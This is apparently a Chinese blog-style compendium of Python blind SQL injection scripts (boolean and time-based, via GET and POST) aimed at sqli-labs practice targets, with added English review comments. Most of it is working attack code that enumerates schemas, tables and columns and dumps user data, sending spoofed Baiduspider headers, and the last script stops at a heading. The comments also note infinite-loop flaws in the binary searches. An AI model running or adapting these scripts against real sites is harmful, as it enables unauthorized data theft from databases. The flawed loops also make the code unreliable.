mysql 盲注脚本大全

目录

1、get bool 盲注

2、get time 盲注

3、post bool 盲注

4、post time 盲注


 

 

 

MySQL中查询所有数据库名和表名

1.查询所有数据库

show databases;
(select group_concat(schema_name ) from information_schema.schemata)

2.查询指定数据库中所有表名

(select group_concat(table_name) from information_schema.tables where table_schema=database())

3.查询指定表中的所有字段名
(select group_concat(column_name) from information_schema.columns where table_name='表名')

4.查询指定字段中的内容

(select group_concat(字段名) from 数据库.表名) ,(select group_concat(username) from security.users)

group_concat(字段) from (表名)
 

1、get bool 盲注

import requests
from urllib.parse import quote

# Shared HTTP session; only Database_length() below actually uses it, the
# other functions call requests.get directly.
session = requests.session()

# url = "http://61.147.171.105:62055/view.php?no=1"
url="http://35bc1ed6-1ac7-4e98-8a8f-becd773b3277.node4.buuoj.cn/Less-1/?id=1'" # the quote-closing style is expressed here
# Crawler-style request headers. Every probe below is sent with this same fixed
# User-Agent/Referer pair, which makes the request burst easy to spot in logs.
headers={'User-Agent':"Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)",
        'Referer': "http://www.baidu.com/"
}

# Browser-style request headers (unused alternative)
# headers = {
#     'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36",
#     'Referer': "https://creator.douyin.com/"
# }

# Marker text whose presence in a response body is treated as a "true" answer.
success_text="Your Login name"


#爆当前数据库名长度
def Database_length() -> None:
    """Print the length of the current database name found by boolean-based blind probes.

    Tries lengths 1..9 against the module-level ``url`` with ``headers``; a
    response body containing ``success_text`` is taken as "true". Prints 0
    when no length in that range matched. Returns nothing.
    """
    database_length=0
    # Only lengths 1..9 are probed; a longer name is reported as 0.
    for i in range(1,10):
        payload = quote(" and length(database())="+str(i)+"#")# URL-encode the special characters
        # The only call in this script that goes through the shared session.
        text=session.get(url+payload,headers=headers).text
        if success_text in text:
            database_length=i
            break
    print("database_length:",database_length)



# 爆当前数据库名字
def Database_name() -> None:
    """Print the current database name, recovered one character at a time by boolean-based blind probes.

    Uses the module-level ``url``, ``headers`` and ``success_text``; takes no
    arguments and returns nothing. Each position is resolved by a binary
    search over ASCII 32..126: an equality probe at ``mid`` first, then a
    ``>`` probe to halve the interval, i.e. up to about 14 requests per
    character, and the partial result is printed after every character.
    """
    database_name=""
    for i in range(1,100):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 =" and ascii(substr(database(), " + str(i) + ", 1)) = " + str(mid)+"#"
            # Sent with requests.get directly rather than the module-level session.
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                database_name+=chr(mid)
                print(database_name)
                break
            payload2 = quote(" and ascii(substr(database(), " + str(i) + ", 1)) > " + str(mid)+"#")
            text2 = requests.get(url+payload2 , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
            # NOTE(review): an exact match is the only exit. Once right == left + 1
            # and neither probe matches, mid stops changing and this loop never
            # ends (presumably once i is past the end of the name), so the final
            # print below is not reached.

    print("database_name:", database_name)

# 爆数据库名
def Databases_names() -> None:
    """Print the comma-joined list of schema names from information_schema.schemata, recovered by boolean-based blind probes.

    Uses the module-level ``url``, ``headers`` and ``success_text``; takes no
    arguments and returns nothing. Positions 1..999 of the group_concat
    result are resolved by a binary search over ASCII 32..126 (equality probe
    first, then a ``>`` probe); the partial string is printed per character.
    """
    databases_names=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) =%d # "%(i,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                databases_names+=chr(mid)
                print(databases_names)
                break
            payload2 = " and  (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) >%d # "%(i,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
            # NOTE(review): an exact match is the only exit; when right == left + 1
            # and neither probe matches, mid no longer changes and this loop
            # never terminates, so the final print is not reached.

    print("databases_names:",databases_names)

# 爆表名
def Tables_name(database_name: str) -> None:
    """Print the comma-joined table names of ``database_name`` from information_schema.tables, recovered by boolean-based blind probes.

    Args:
        database_name: schema name interpolated verbatim into the probe's
            ``table_schema = '...'`` filter.

    Uses the module-level ``url``, ``headers`` and ``success_text``; returns
    nothing. Each of positions 1..999 is resolved by a binary search over
    ASCII 32..126 and the partial string is printed per character.
    """
    tables_name=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') =%d # "%(i,database_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                tables_name+=chr(mid)
                print(tables_name)
                break
            payload2 = " and  (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') >%d # "%(i,database_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
            # NOTE(review): an exact match is the only exit; when right == left + 1
            # and neither probe matches, this loop never terminates and the
            # final print is not reached.

    print("tables_names:",tables_name)



# 爆列名
def Columns_name(table_name: str) -> None:
    """Print the comma-joined column names of ``table_name`` from information_schema.columns, recovered by boolean-based blind probes.

    Args:
        table_name: table name interpolated verbatim into the probe's
            ``table_name = '...'`` filter (no schema filter, so same-named
            tables in other schemas are included).

    Uses the module-level ``url``, ``headers`` and ``success_text``; returns
    nothing. Each of positions 1..999 is resolved by a binary search over
    ASCII 32..126 and the partial string is printed per character.
    """
    columns_name=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') =%d # "%(i,table_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                columns_name+=chr(mid)
                print(columns_name)
                break
            payload2 = " and  (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') >%d # "%(i,table_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
            # NOTE(review): an exact match is the only exit; when right == left + 1
            # and neither probe matches, this loop never terminates and the
            # final print is not reached.
    # The label says "tables_names" but the value printed is the column list.
    print("tables_names:",columns_name)



# 爆字段内容
# (select group_concat(字段名) from 数据库.表名)
def Dump(database_name: str, table_name: str, columns_name: str) -> None:
    """Print the comma-joined values of one column of ``database_name.table_name``, recovered by boolean-based blind probes.

    Args:
        database_name: schema name, interpolated unquoted into ``from %s.%s``.
        table_name: table name, interpolated unquoted into ``from %s.%s``.
        columns_name: column expression placed inside ``group_concat(...)``.

    Uses the module-level ``url``, ``headers`` and ``success_text``; returns
    nothing. Each of positions 1..999 is resolved by a binary search over
    ASCII 32..126 and the partial string is printed per character.
    """
    dump=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) =%d # "%(columns_name,i,database_name,table_name,mid)
            text1=requests.get(url+quote(payload1) , headers=headers).text
            if (success_text in text1):
                dump+=chr(mid)
                print(dump)
                break
            payload2 = " and  (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) >%d # "%(columns_name,i,database_name,table_name,mid)
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
            # NOTE(review): an exact match is the only exit; when right == left + 1
            # and neither probe matches, this loop never terminates and the
            # final print is not reached.
    print("dump:",dump)

# Script entry: only Databases_names() is active; the other calls are kept
# commented out as usage examples. Note that this runs on import.

# Print the length of the current database name
# Database_length()

# Print the current database name
# Database_name()

# Print all database names
Databases_names()

# Print the table names of a given database
# argument: database name
# Tables_name("security")

# Print the column names of a given table
# argument: table name
# Columns_name("emails")

# Print the contents of a given database/table/column
# Dump("security","users","username")

2、get time 盲注

import requests
from urllib.parse import quote
import time
url = '''http://192.168.215.134:86/Less-16/?uname=admin") '''  #闭合方式在这里体现

# 爬虫请求头
headers={'User-Agent':"Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)",
         'Referer': "http://www.baidu.com/"
         }

# 爆当前数据库名字
def Database_name() -> None:
    """Print the current database name, recovered one character at a time by time-based blind probes.

    Uses the module-level ``url`` and ``headers``; takes no arguments and
    returns nothing. A probe is treated as "true" when the round trip takes
    longer than 0.5 s (the payload asks the server to sleep(1) on a match).
    Each position is resolved by a binary search over ASCII 32..126 and the
    partial result is printed after every character.
    """
    database_name=""
    for i in range(1,100):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 =" and if(ascii(substr(database(),%d,1))=%d,sleep(1),1)#"%(i,mid)
            start_time=time.time()
            # print(start_time)
            # Response body is discarded; only the elapsed wall-clock time matters.
            requests.get(url+quote(payload1) , headers=headers)
            # print(time.time())
            # The timer spans the whole request (no timeout is set), so network
            # latency or server load above 0.5 s reads as a "true" answer.
            if (time.time()-start_time>0.5):
                database_name+=chr(mid)
                print(database_name)
                break
            payload2 =" and if(ascii(substr(database(),%d,1))>%d,sleep(1),1)#"%(i,mid)
            start_time=time.time()
            requests.get(url+quote(payload2) , headers=headers)
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
            # NOTE(review): a timed-out equality probe is the only exit; when
            # right == left + 1 and neither probe is slow, this loop never
            # terminates and the final print is not reached.

    print("database_name:", database_name)

# 爆数据库名
def Databases_names() -> None:
    """Print the comma-joined schema names from information_schema.schemata, recovered by time-based blind probes.

    Uses the module-level ``url`` and ``headers``; takes no arguments and
    returns nothing. A probe is "true" when the request takes longer than
    0.5 s. Positions 1..999 are resolved by a binary search over ASCII
    32..126 and the partial string is printed per character.
    """
    databases_names=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  if((select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) =%d,sleep(1),1) # "%(i,mid)
            start_time=time.time()
            # text1 is never read; only the elapsed time is used.
            text1=requests.get(url+quote(payload1) , headers=headers).text
            # Timer spans the whole request (no timeout), so latency counts too.
            if (time.time()-start_time>0.5):
                databases_names+=chr(mid)
                print(databases_names)
                break
            payload2 = " and  if((select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) >%d,sleep(1),1) # "%(i,mid)
            start_time=time.time()
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
            # NOTE(review): a slow equality probe is the only exit; when
            # right == left + 1 and neither probe is slow, this loop never
            # terminates and the final print is not reached.

    print("databases_names:",databases_names)

# 爆表名
def Tables_name(database_name: str) -> None:
    """Print the comma-joined table names of ``database_name``, recovered by time-based blind probes.

    Args:
        database_name: schema name interpolated verbatim into the probe's
            ``table_schema = '...'`` filter.

    Uses the module-level ``url`` and ``headers``; returns nothing. A probe
    is "true" when the request takes longer than 0.5 s. Positions 1..999 are
    resolved by a binary search over ASCII 32..126.
    """
    tables_name=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  if((select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') =%d,sleep(1),1) # "%(i,database_name,mid)
            start_time=time.time()
            # text1 is never read; only the elapsed time is used.
            text1=requests.get(url+quote(payload1) , headers=headers).text
            # Timer spans the whole request (no timeout), so latency counts too.
            if (time.time()-start_time>0.5):
                tables_name+=chr(mid)
                print(tables_name)
                break
            payload2 = " and  if((select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') >%d,sleep(1),1) # "%(i,database_name,mid)
            start_time=time.time()
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
            # NOTE(review): a slow equality probe is the only exit; when
            # right == left + 1 and neither probe is slow, this loop never
            # terminates and the final print is not reached.

    print("tables_names:",tables_name)



# 爆列名
def Columns_name(table_name: str) -> None:
    """Print the comma-joined column names of ``table_name``, recovered by time-based blind probes.

    Args:
        table_name: table name interpolated verbatim into the probe's
            ``table_name = '...'`` filter (no schema filter).

    Uses the module-level ``url`` and ``headers``; returns nothing. A probe
    is "true" when the request takes longer than 0.5 s. Positions 1..999 are
    resolved by a binary search over ASCII 32..126.
    """
    columns_name=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  if((select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') =%d,sleep(1),1) # "%(i,table_name,mid)
            start_time=time.time()
            # text1 is never read; only the elapsed time is used.
            text1=requests.get(url+quote(payload1) , headers=headers).text
            # Timer spans the whole request (no timeout), so latency counts too.
            if (time.time()-start_time>0.5):
                columns_name+=chr(mid)
                print(columns_name)
                break
            payload2 = " and  if((select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') >%d,sleep(1),1) # "%(i,table_name,mid)
            start_time=time.time()
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
            # NOTE(review): a slow equality probe is the only exit; when
            # right == left + 1 and neither probe is slow, this loop never
            # terminates and the final print is not reached.
    # The label says "tables_names" but the value printed is the column list.
    print("tables_names:",columns_name)



# 爆字段内容
# (select group_concat(字段名) from 数据库.表名)
def Dump(database_name: str, table_name: str, columns_name: str) -> None:
    """Print the comma-joined values of one column of ``database_name.table_name``, recovered by time-based blind probes.

    Args:
        database_name: schema name, interpolated unquoted into ``from %s.%s``.
        table_name: table name, interpolated unquoted into ``from %s.%s``.
        columns_name: column expression placed inside ``group_concat(...)``.

    Uses the module-level ``url`` and ``headers``; returns nothing. A probe
    is "true" when the request takes longer than 0.5 s. Positions 1..999 are
    resolved by a binary search over ASCII 32..126.
    """
    dump=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = " and  if((select ascii(substr(group_concat(%s),%d,1)) from %s.%s) =%d,sleep(1),1) # "%(columns_name,i,database_name,table_name,mid)
            start_time=time.time()
            # text1 is never read; only the elapsed time is used.
            text1=requests.get(url+quote(payload1) , headers=headers).text
            # Timer spans the whole request (no timeout), so latency counts too.
            if (time.time()-start_time>0.5):
                dump+=chr(mid)
                print(dump)
                break
            payload2 = " and  if((select ascii(substr(group_concat(%s),%d,1)) from %s.%s) >%d,sleep(1),1) # "%(columns_name,i,database_name,table_name,mid)
            start_time=time.time()
            text2 = requests.get(url+quote(payload2) , headers=headers).text
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
            # NOTE(review): a slow equality probe is the only exit; when
            # right == left + 1 and neither probe is slow, this loop never
            # terminates and the final print is not reached.
    print("dump:",dump)

# Script entry: only Database_name() is active; the other calls are kept
# commented out as usage examples. Database_length() is referenced here but
# not defined in this script. Note that this runs on import.

# Print the length of the current database name
# Database_length()

# Print the current database name
Database_name()

# Print all database names
# Databases_names()

# Print the table names of a given database
# argument: database name
# Tables_name("security")

# Print the column names of a given table
# argument: table name
# Columns_name("users")

# Print the contents of a given database/table/column
# Dump("security","users","username")

3、post bool 盲注

 

import requests
from urllib.parse import quote
import time
import  json

# Target URL for the POST requests; the payload is carried in the form data,
# not in the URL (``quote``, ``time`` and ``json`` are imported above but
# unused in this script).
url = '''http://192.168.215.134:86/Less-16/'''

# Marker text whose presence in a response body is treated as a "true" answer.
success_text="../images/flag.jpg"

# The payload is set inside the form data

# Crawler-style request headers, identical for every probe (a fixed
# User-Agent/Referer pair is a useful log signature for this traffic).
headers={'User-Agent':"Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)",
         'Referer': "http://www.baidu.com/",
         'Content-Type': 'application/x-www-form-urlencoded',# send the POST body as a form

         }
# 爆当前数据库名字
def Database_name() -> None:
    """Print the current database name, recovered one character at a time by boolean-based blind POST probes.

    Uses the module-level ``url``, ``headers`` and ``success_text``; takes no
    arguments and returns nothing. The probe is submitted as the ``uname``
    form field; a response containing ``success_text`` is "true". Each
    position is resolved by a binary search over ASCII 32..126 and the
    partial result is printed after every character.
    """
    database_name=""
    for i in range(1,100):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and ascii(substring(database(),%d,1))=%d #'''%(i,mid)
            # Form fields; requests form-encodes the dict, so no manual quoting.
            data1 = {
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            text1=requests.post(url ,data=data1, headers=headers).text
            if (success_text in text1):
                database_name+=chr(mid)
                print(database_name)
                break
            payload2='''admin") and ascii(substring(database(),%d,1))>%d #'''%(i,mid)
            data2 = {'uname':payload2,
                     'passwd':'',
                     'submit':'Submit',
                     }
            text2=requests.post(url ,data=data2 ,headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
            # NOTE(review): an exact match is the only exit; when right == left + 1
            # and neither probe matches, this loop never terminates and the
            # final print is not reached.

    print("database_name:", database_name)

# 爆数据库名
def Databases_names() -> None:
    """Print the comma-joined schema names from information_schema.schemata, recovered by boolean-based blind POST probes.

    Uses the module-level ``url``, ``headers`` and ``success_text``; takes no
    arguments and returns nothing. The probe travels in the ``uname`` form
    field. Positions 1..999 are resolved by a binary search over ASCII
    32..126 and the partial string is printed per character.
    """
    databases_names=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) =%d # '''%(i,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }

            text1=requests.post(url,data=data1, headers=headers).text
            if (success_text in text1):
                databases_names+=chr(mid)
                print(databases_names)
                break
            payload2='''admin") and  (select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) >%d # '''%(i,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }

            text2=requests.post(url,data=data2, headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
            # NOTE(review): an exact match is the only exit; when right == left + 1
            # and neither probe matches, this loop never terminates and the
            # final print is not reached.

    print("databases_names:",databases_names)

# 爆表名
def Tables_name(database_name: str) -> None:
    """Print the comma-joined table names of ``database_name``, recovered by boolean-based blind POST probes.

    Args:
        database_name: schema name interpolated verbatim into the probe's
            ``table_schema = '...'`` filter.

    Uses the module-level ``url``, ``headers`` and ``success_text``; returns
    nothing. Positions 1..999 are resolved by a binary search over ASCII
    32..126 and the partial string is printed per character.
    """
    tables_name=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and  (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') =%d #'''%(i,database_name,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }

            text1=requests.post(url ,data=data1 ,headers=headers).text
            if (success_text in text1):
                tables_name+=chr(mid)
                print(tables_name)
                break
            payload2='''admin") and  (select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') >%d #'''%(i,database_name,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }

            text2 = requests.post(url,data=data2, headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
            # NOTE(review): an exact match is the only exit; when right == left + 1
            # and neither probe matches, this loop never terminates and the
            # final print is not reached.

    print("tables_names:",tables_name)



# 爆列名
def Columns_name(table_name: str) -> None:
    """Print the comma-joined column names of ``table_name``, recovered by boolean-based blind POST probes.

    Args:
        table_name: table name interpolated verbatim into the probe's
            ``table_name = '...'`` filter (no schema filter).

    Uses the module-level ``url``, ``headers`` and ``success_text``; returns
    nothing. Positions 1..999 are resolved by a binary search over ASCII
    32..126 and the partial string is printed per character.
    """
    columns_name=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') =%d # '''%(i,table_name,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            text1=requests.post(url ,data=data1 ,headers=headers).text
            if (success_text in text1):
                columns_name+=chr(mid)
                print(columns_name)
                break
            payload2='''admin") and  (select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') >%d # '''%(i,table_name,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }

            text2=requests.post(url ,data=data2, headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
            # NOTE(review): an exact match is the only exit; when right == left + 1
            # and neither probe matches, this loop never terminates and the
            # final print is not reached.
    # The label says "tables_names" but the value printed is the column list.
    print("tables_names:",columns_name)



# 爆字段内容
# (select group_concat(字段名) from 数据库.表名)
def Dump(database_name: str, table_name: str, columns_name: str) -> None:
    """Print the comma-joined values of one column of ``database_name.table_name``, recovered by boolean-based blind POST probes.

    Args:
        database_name: schema name, interpolated unquoted into ``from %s.%s``.
        table_name: table name, interpolated unquoted into ``from %s.%s``.
        columns_name: column expression placed inside ``group_concat(...)``.

    Uses the module-level ``url``, ``headers`` and ``success_text``; returns
    nothing. Positions 1..999 are resolved by a binary search over ASCII
    32..126 and the partial string is printed per character.
    """
    dump=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1 = '''admin") and  (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) =%d # '''%(columns_name,i,database_name,table_name,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }

            text1=requests.post(url , data=data1,headers=headers).text
            if (success_text in text1):
                dump+=chr(mid)
                print(dump)
                break
            payload2 = '''admin") and  (select ascii(substr(group_concat(%s),%d,1)) from %s.%s) >%d # '''%(columns_name,i,database_name,table_name,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }
            text2 = requests.post(url ,data=data2, headers=headers).text
            if (success_text in text2):
                left=mid
            else:
                right=mid
            # NOTE(review): an exact match is the only exit; when right == left + 1
            # and neither probe matches, this loop never terminates and the
            # final print is not reached.
    print("dump:",dump)

# Script entry: only Dump("security","users","username") is active; the
# other calls are kept commented out as usage examples. Runs on import.

# Print the current database name
# Database_name()

# Print all database names
# Databases_names()

# Print the table names of a given database
# argument: database name
# Tables_name("security")

# Print the column names of a given table
# argument: table name
# Columns_name("users")

# Print the contents of a given database/table/column
Dump("security","users","username")

4、post time 盲注

import requests
from urllib.parse import quote
import time
import  json

# Target URL for the POST requests; the payload is carried in the form data,
# not in the URL (``quote`` and ``json`` are imported above but unused here).
url = '''http://192.168.215.134:86/Less-16/'''

# The payload is set inside the form data

# Crawler-style request headers, identical for every probe (a fixed
# User-Agent/Referer pair is a useful log signature for this traffic).
headers={'User-Agent':"Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)",
         'Referer': "http://www.baidu.com/",
         'Content-Type': 'application/x-www-form-urlencoded',# send the POST body as a form

         }
# 爆当前数据库名字
def Database_name() -> None:
    """Print the current database name, recovered one character at a time by time-based blind POST probes.

    Uses the module-level ``url`` and ``headers``; takes no arguments and
    returns nothing. The probe travels in the ``uname`` form field and is
    "true" when the round trip takes longer than 0.5 s. Each position is
    resolved by a binary search over ASCII 32..126 and the partial result is
    printed after every character.
    """
    database_name=""
    for i in range(1,100):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and if(ascii(substring(database(),%d,1))=%d,sleep(1),1) #'''%(i,mid)
            data1 = {
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            # Response body is discarded; only the elapsed wall-clock time matters.
            requests.post(url ,data=data1, headers=headers)
            # Timer spans the whole request (no timeout), so latency counts too.
            if (time.time()-start_time>0.5):
                database_name+=chr(mid)
                print(database_name)
                break
            payload2='''admin") and if(ascii(substring(database(),%d,1))>%d,sleep(1),1) #'''%(i,mid)
            data2 = {'uname':payload2,
                     'passwd':'',
                     'submit':'Submit',
            }
            start_time=time.time()
            requests.post(url ,data=data2 ,headers=headers)
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
            # NOTE(review): a slow equality probe is the only exit; when
            # right == left + 1 and neither probe is slow, this loop never
            # terminates and the final print is not reached.

    print("database_name:", database_name)

# 爆数据库名
def Databases_names() -> None:
    """Print the comma-joined schema names from information_schema.schemata, recovered by time-based blind POST probes.

    Uses the module-level ``url`` and ``headers``; takes no arguments and
    returns nothing. A probe is "true" when the request takes longer than
    0.5 s. Positions 1..999 are resolved by a binary search over ASCII
    32..126 and the partial string is printed per character.
    """
    databases_names=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and  if((select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) =%d,sleep(1),1) # '''%(i,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            # Response body is discarded; only the elapsed wall-clock time matters.
            requests.post(url,data=data1, headers=headers)
            # Timer spans the whole request (no timeout), so latency counts too.
            if (time.time()-start_time>0.5):
                databases_names+=chr(mid)
                print(databases_names)
                break
            payload2='''admin") and  if((select ascii(substr(group_concat(schema_name),%d,1)) from information_schema.schemata) >%d,sleep(1),1) # '''%(i,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            requests.post(url,data=data2, headers=headers)
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
            # NOTE(review): a slow equality probe is the only exit; when
            # right == left + 1 and neither probe is slow, this loop never
            # terminates and the final print is not reached.

    print("databases_names:",databases_names)

# 爆表名
def Tables_name(database_name: str) -> None:
    """Print the comma-joined table names of ``database_name``, recovered by time-based blind POST probes.

    Args:
        database_name: schema name interpolated verbatim into the probe's
            ``table_schema = '...'`` filter.

    Uses the module-level ``url`` and ``headers``; returns nothing. A probe
    is "true" when the request takes longer than 0.5 s. Positions 1..999 are
    resolved by a binary search over ASCII 32..126.
    """
    tables_name=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and  if((select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') =%d,sleep(1),1) #'''%(i,database_name,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            # Response body is discarded; only the elapsed wall-clock time matters.
            requests.post(url ,data=data1 ,headers=headers)
            # Timer spans the whole request (no timeout), so latency counts too.
            if (time.time()-start_time>0.5):
                tables_name+=chr(mid)
                print(tables_name)
                break
            payload2='''admin") and  if((select ascii(substr(group_concat(table_name),%d,1)) from information_schema.tables where table_schema = '%s') >%d,sleep(1),1) #'''%(i,database_name,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            # text2 is never read; only the elapsed time is used.
            text2 = requests.post(url,data=data2, headers=headers).text
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
            # NOTE(review): a slow equality probe is the only exit; when
            # right == left + 1 and neither probe is slow, this loop never
            # terminates and the final print is not reached.

    print("tables_names:",tables_name)



# 爆列名
def Columns_name(table_name: str) -> None:
    """Print the comma-joined column names of ``table_name``, recovered by time-based blind POST probes.

    Args:
        table_name: table name interpolated verbatim into the probe's
            ``table_name = '...'`` filter (no schema filter).

    Uses the module-level ``url`` and ``headers``; returns nothing. A probe
    is "true" when the request takes longer than 0.5 s. Positions 1..999 are
    resolved by a binary search over ASCII 32..126.
    """
    columns_name=""
    for i in range(1,1000):
        # Printable-ASCII search window for the character at position i.
        left, right = 32,126
        while (1):
            mid = (left + right) // 2
            payload1='''admin") and if((select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') =%d,sleep(1),1) # '''%(i,table_name,mid)
            data1={
                'uname':payload1,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            # Response body is discarded; only the elapsed wall-clock time matters.
            requests.post(url ,data=data1 ,headers=headers)
            # Timer spans the whole request (no timeout), so latency counts too.
            if (time.time()-start_time>0.5):
                columns_name+=chr(mid)
                print(columns_name)
                break
            payload2='''admin") and  if((select ascii(substr(group_concat(column_name),%d,1)) from information_schema.columns where table_name = '%s') >%d,sleep(1),1) # '''%(i,table_name,mid)
            data2={
                'uname':payload2,
                'passwd':'',
                'submit':'Submit',
            }
            start_time=time.time()
            requests.post(url ,data=data2, headers=headers)
            if (time.time()-start_time>0.5):
                left=mid
            else:
                right=mid
            # NOTE(review): a slow equality probe is the only exit; when
            # right == left + 1 and neither probe is slow, this loop never
            # terminates and the final print is not reached.
    # The label says "tables_names" but the value printed is the column list.
    print("tables_names:",columns_name)



# 爆字段内容
# (select group_concat(字段名) from 数据库.表名)
